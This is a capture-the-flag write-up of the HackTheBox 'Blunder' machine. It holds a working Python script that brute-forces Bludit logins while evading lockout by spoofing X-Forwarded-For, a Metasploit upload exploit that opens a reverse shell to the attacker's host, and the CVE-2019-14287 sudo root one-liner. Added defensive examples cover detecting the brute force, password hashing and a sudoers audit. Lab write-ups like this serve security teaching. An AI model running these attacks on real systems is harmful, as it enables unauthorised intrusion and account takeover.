HackTheBox - Blunder

Summary

Blunder, a Linux box created by HackTheBox user egotisticalSW, is an easy-rated box. The initial foothold was finding a username in todo.txt and brute-forcing the password with a wordlist created from the blog posts. Using Metasploit we get a shell as www-data and then find a user.php which contains a password hash for the user. Cracking the hash and using su we get the user. Checking sudo -l we see we can run /bin/bash as any user other than root, and the sudo version is 1.8.25p1, which has a CVE that lets us get root.

Enumeration

nmap

# Nmap 7.80 scan initiated Sun May 31 01:00:46 2020 as: nmap -sC -sV -T4 -oN nmap/scan 10.10.10.191
Nmap scan report for 10.10.10.191
Host is up (0.36s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Blunder | A blunder of interesting facts

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun May 31 01:02:06 2020 -- 1 IP address (1 host up) scanned in 79.95 seconds

web

We also find an admin page.

A little bit of googling shows it is running Bludit.

Checking the About page:

I created this site to dump my fact files, nothing more.......?

gobuster also reveals:

gobuster dir  -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -u http://10.10.10.191/  -x txt  -o root-txt.gobust
/.php (Status: 403)
/.html (Status: 403)
/.html.txt (Status: 403)
/admin (Status: 301)
/.htm (Status: 403)
/.htm.txt (Status: 403)
/LICENSE (Status: 200)
/about (Status: 200)
/.htaccess (Status: 403)
/.htaccess.txt (Status: 403)
/0 (Status: 200)
/robots.txt (Status: 200)
/todo.txt (Status: 200)

a todo.txt, and checking that we see

which gives us a possible username: fergus

Trying to brute-force the password, we get our IP blocked by Bludit. So I googled,

and googling around we find an article.

Using that I tried with rockyou.txt; after running for some time I still hadn't got the password. As a last effort I tried

cewl http://10.10.10.191 > custom
#!/usr/bin/env python3
import re
import requests

host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus' # or admin?
cnt = 0
filepath = './small-list'  # wordlist, one candidate per line (here the cewl output)
with open(filepath) as fp:
    password = fp.readline().strip()
    cnt = cnt + 1
    while True:
        # fresh session per attempt so the CSRF token comes from a freshly served login page
        session = requests.Session()
        login_page = session.get(login_url)
        csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

        print('[*] Trying: {c} {p}'.format(p = password, c = cnt))

        headers = {
            # Bludit's lockout keys on this header, so every attempt presents a new value
            'X-Forwarded-For': password,
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
            'Referer': login_url
        }

        data = {
            'tokenCSRF': csrf_token,
            'username': username,
            'password': password,
            'save': ''
        }

        login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)
        # a successful login answers with a redirect to the dashboard
        if 'location' in login_result.headers:
            if '/admin/dashboard' in login_result.headers['location']:
                print()
                print('SUCCESS: Password found!')
                print('Use {u}:{p} to login.'.format(u = username, p = password))
                print()
                break
        line = fp.readline()
        if not line:  # end of wordlist reached without a hit
            print('[-] Wordlist exhausted, no password found')
            break
        password = line.strip()
        cnt = cnt + 1
python3 brute.py
...
[*] Trying: 175 Contribution
[*] Trying: 176 RolandDeschain

SUCCESS: Password found!
Use fergus:RolandDeschain to login.

Using that script we get the credentials as

fergus:RolandDeschain
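From the defender's side, the giveaway in the script above is one TCP peer sending many login POSTs while presenting a different X-Forwarded-For value on each, because the lockout honours that header instead of the socket address. The following is an added example, not code from the writeup or from Bludit, that runs that check over Apache access-log lines. It assumes a custom LogFormat that appends the X-Forwarded-For header as the last quoted field (the stock "combined" format does not log it), and the sample log lines are constructed.

```python
#!/usr/bin/env python3
"""Detect a login brute force that rotates X-Forwarded-For to evade a per-IP lockout.
Added example, not code from the original post or from Bludit."""
import ipaddress
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed Apache log format (the stock "combined" format does not log the header):
#   LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" \"%{X-Forwarded-For}i\"" xff
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<xff>[^"]*)"$'
)

# Constructed sample: one client hammering the Bludit login with a dictionary
# word in X-Forwarded-For on every request, plus two benign requests.
SAMPLE_LOG = """\
10.10.14.133 - - [31/May/2020:01:30:01 +0000] "POST /admin/login HTTP/1.1" 200 2741 "http://10.10.10.191/admin/login" "Mozilla/5.0" "interesting"
10.10.14.133 - - [31/May/2020:01:30:02 +0000] "POST /admin/login HTTP/1.1" 200 2741 "http://10.10.10.191/admin/login" "Mozilla/5.0" "facts"
10.10.14.133 - - [31/May/2020:01:30:02 +0000] "POST /admin/login HTTP/1.1" 200 2741 "http://10.10.10.191/admin/login" "Mozilla/5.0" "blunder"
10.10.14.133 - - [31/May/2020:01:30:03 +0000] "POST /admin/login HTTP/1.1" 200 2741 "http://10.10.10.191/admin/login" "Mozilla/5.0" "nothing"
10.10.14.133 - - [31/May/2020:01:30:04 +0000] "POST /admin/login HTTP/1.1" 302 0 "http://10.10.10.191/admin/login" "Mozilla/5.0" "dump"
192.168.1.20 - - [31/May/2020:01:31:00 +0000] "POST /admin/login HTTP/1.1" 302 0 "http://10.10.10.191/admin/login" "Mozilla/5.0" "-"
192.168.1.21 - - [31/May/2020:01:35:00 +0000] "GET /about HTTP/1.1" 200 5120 "-" "Mozilla/5.0" "-"
"""


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def looks_like_ip(value):
    """True for a syntactically valid IPv4/IPv6 address, which is all a real proxy would send."""
    try:
        ipaddress.ip_address(value.strip())
        return True
    except ValueError:
        return False


def detect_login_bruteforce(log_text, login_path="/admin/login",
                            window=timedelta(minutes=5), max_attempts=5):
    """Key login POSTs on the TCP peer address (%h), never on X-Forwarded-For, and
    flag any peer with >= max_attempts inside a sliding window. The finding also
    reports how many distinct XFF values it sent and which are not IP addresses at all."""
    per_ip = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            per_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        start = 0
        for end in range(len(recs)):
            while recs[end]["ts"] - recs[start]["ts"] > window:
                start += 1
            count = end - start + 1
            if count >= max_attempts:
                xffs = {r["xff"] for r in recs[start:end + 1]}
                findings[ip] = {
                    "attempts": count,
                    "distinct_xff": len(xffs),
                    "bogus_xff": sorted(x for x in xffs if x != "-" and not looks_like_ip(x)),
                }
                break
    return findings


if __name__ == "__main__":
    for ip, f in detect_login_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {f['attempts']} login attempts, {f['distinct_xff']} distinct "
              f"X-Forwarded-For values, non-IP values: {f['bogus_xff']}")
```

The same rule applies to the application side of the fix: a lockout should count attempts by the socket peer address, and trust X-Forwarded-For only when the request demonstrably came from a configured reverse proxy.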

searchsploit on Bludit shows two exploits:

searchsploit bludit
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Bludit - Directory Traversal Image File Upload (Metasploit) | php/remote/47699.rb
bludit Pages Editor 3.0.0 - Arbitrary File Upload | php/webapps/46060.txt
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Checking the web page we find the version as 3.9.2,

and we can get a shell using Metasploit as:

$ msfconsole
msf5 use exploit/linux/http/bludit_upload_images_exec
msf5 exploit(linux/http/bludit_upload_images_exec) > set RHOSTS 10.10.10.191
RHOSTS => 10.10.10.191
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITUSER fergus
BLUDITUSER => fergus
msf5 exploit(linux/http/bludit_upload_images_exec) > set BLUDITPASS RolandDeschain
BLUDITPASS => RolandDeschain
msf5 exploit(linux/http/bludit_upload_images_exec) > exploit
[*] Started reverse TCP handler on 10.10.14.133:4444
[+] Logged in as: fergus
[*] Retrieving UUID...
[*] Uploading eEmaECuGvt.png...
[*] Uploading .htaccess...
[*] Executing eEmaECuGvt.png...
[*] Sending stage (38288 bytes) to 10.10.10.191
[*] Meterpreter session 1 opened (10.10.14.133:4444 -> 10.10.10.191:42114) at 2020-05-31 02:27:37 +0530
[+] Deleted .htaccess

meterpreter > shell

We get a shell as www-data.

User

After getting the shell as www-data and enumerating the box, we find two versions of Bludit:

www-data@blunder:/var/www$ ls -la
total 20
drwxr-xr-x 5 root root 4096 Nov 28 2019 .
drwxr-xr-x 15 root root 4096 Nov 27 2019 ..
drwxr-xr-x 8 www-data www-data 4096 May 19 15:13 bludit-3.10.0a
drwxrwxr-x 8 www-data www-data 4096 Apr 28 12:18 bludit-3.9.2
drwxr-xr-x 2 root root 4096 Nov 28 2019 html
www-data@blunder:/var/www$

bludit-3.10.0a and bludit-3.9.2.

In /var/www/bludit-3.10.0a/bl-content/databases we find a file user.php:

<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
"admin": {
"nickname": "Hugo",
"firstName": "Hugo",
"lastName": "",
"role": "User",
"password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
"email": "",
"registered": "2019-11-27 07:40:55",
"tokenRemember": "",
"tokenAuth": "b380cb62057e9da47afce66b4615107d",
"tokenAuthTTL": "2009-03-15 14:00",
"twitter": "",
"facebook": "",
"instagram": "",
"codepen": "",
"linkedin": "",
"github": "",
"gitlab": ""}
}

which contains a hash; cracking it gives the password

for user hugo as Password120.
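The entry in user.php stores a bare 40-hex-character digest with no salt field, which is why a wordlist check finds it so quickly. The following added example (not Bludit's code and not the writeup's) shows that weak form beside a hardened PBKDF2 store with a per-user random salt and a constant-time verify. The digest is the one from user.php above; the candidate list is constructed.

```python
#!/usr/bin/env python3
"""Unsalted fast hash versus a salted, iterated password store.
Added example, not Bludit's code or the writeup's."""
import hashlib
import hmac
import os

PAGE_HASH = "faca404fd5c0a31cf1897b823c695c85cffeb98d"  # value shown in user.php on the box


def weak_hash(password):
    """One SHA-1 pass, no salt, the shape of the entry above: two users with the same
    password share a digest, and each wordlist candidate costs a single cheap hash."""
    return hashlib.sha1(password.encode()).hexdigest()


def check_wordlist(target_hex, candidates):
    """Return the first candidate whose weak_hash equals target_hex, else None.
    For an unsalted fast hash this loop is the entire 'cracking' step."""
    for cand in candidates:
        if hmac.compare_digest(weak_hash(cand), target_hex):
            return cand
    return None


def hardened_hash(password, salt=None, iterations=200_000):
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, stored as iterations$salt$dk
    so the parameters travel with the record and can be raised later."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"{iterations}${salt.hex()}${dk.hex()}"


def verify_hardened(password, stored):
    """Recompute with the stored salt and iteration count; compare in constant time."""
    iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    wordlist = ["password", "blunder", "facts", "Password120"]  # constructed
    print("weak hash match:", check_wordlist(PAGE_HASH, wordlist))
    stored = hardened_hash("Password120")
    print("hardened record:", stored)
    print("verify ok:", verify_hardened("Password120", stored),
          "wrong password:", verify_hardened("Password121", stored))
```

The hardened record is no harder to store (one string per user), but each guess now costs the attacker the full iteration count and a salt-specific computation, so a leaked database no longer falls to a plain wordlist pass.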

Privilege Escalation

Running sudo -l on the box reveals:

hugo@blunder:~$ sudo -l
Matching Defaults entries for hugo on blunder:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
(ALL, !root) /bin/bash
hugo@blunder:~$

We can run /bin/bash as any user but root.

Also, checking sudo -V shows us that

hugo@blunder:~$ sudo -V
sudo -V
Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
hugo@blunder:~$

This is a version of sudo which is vulnerable to CVE-2019-14287, about which I had also written here:

sudo -u#4294967295 /bin/bash
root@blunder:/root# whoami;hostname;cut -c 1-15 root.txt
root
blunder
127aef843502190
root@blunder:/root#

and we have pwned Blunder 💃
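An added example (not from the writeup) that audits the two outputs above the way a host-hardening check would: it parses `sudo -l` for Runas lists of the form (ALL, !user) and `sudo -V` for a version below 1.8.28, the first release carrying the CVE-2019-14287 fix, and reports each such rule with its remediation. The two inputs are the writeup's own outputs for hugo with the shell prompts removed.

```python
#!/usr/bin/env python3
"""Audit `sudo -l` / `sudo -V` output for a Runas list of ALL with a negated user
on a sudo older than 1.8.28. Added example, not part of the original writeup."""
import re

# Sample input: the writeup's own `sudo -l` output for hugo, prompts removed.
SUDO_L = r"""Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash
"""

# Sample input: the writeup's `sudo -V` output.
SUDO_V = """Sudo version 1.8.25p1
Sudoers policy plugin version 1.8.25p1
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.25p1
"""

FIXED_IN = (1, 8, 28, 0)  # first sudo release with the CVE-2019-14287 fix
RULE_RE = re.compile(r'^\s*\((?P<runas>[^)]*)\)\s*(?P<cmd>\S.*)$')


def parse_version(sudo_v_text):
    """'Sudo version 1.8.25p1' -> (1, 8, 25, 1); a missing 'pN' suffix counts as 0."""
    m = re.search(r'Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?', sudo_v_text)
    if not m:
        raise ValueError("no 'Sudo version' line found")
    return tuple(int(x) if x else 0 for x in m.groups())


def runas_rules(sudo_l_text):
    """Yield (runas_users, command) for each rule after the 'may run' header.
    Only the user half of the Runas spec is examined (text before any ':')."""
    in_rules = False
    for line in sudo_l_text.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if m:
            users = m.group("runas").split(":")[0]
            yield [u.strip() for u in users.split(",") if u.strip()], m.group("cmd").strip()


def audit(sudo_l_text, sudo_v_text):
    """One finding per rule shaped like (ALL, !someone). The negation is the trap:
    on an unfixed sudo, 'ALL minus root' still reaches root through a numeric
    user id, so the rule should name the permitted target users explicitly."""
    version = parse_version(sudo_v_text)
    findings = []
    for users, cmd in runas_rules(sudo_l_text):
        excluded = [u[1:] for u in users if u.startswith("!")]
        if "ALL" in users and excluded:
            vulnerable = version < FIXED_IN
            findings.append({
                "command": cmd,
                "excluded": excluded,
                "sudo_version": version,
                "severity": "HIGH" if vulnerable else "INFO",
                "fix": "name allowed Runas users explicitly; " + (
                    "upgrade sudo to 1.8.28 or later" if vulnerable
                    else "version already fixed, rule is still over-broad"),
            })
    return findings


if __name__ == "__main__":
    for f in audit(SUDO_L, SUDO_V):
        print(f"[{f['severity']}] {f['command']}: Runas ALL minus {f['excluded']} "
              f"on sudo {'.'.join(map(str, f['sudo_version']))} -> {f['fix']}")
```

Running it on the box's outputs yields one HIGH finding for the /bin/bash rule. On a patched sudo the same rule is still flagged at INFO, since a negated ALL grants far more than an explicit list of target users would.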

Extra

While doing the box I got into a rabbit hole after getting www-data. I saw a /ftp folder, got that folder, and was looking in it to see if it could get us user.

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/blunder/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.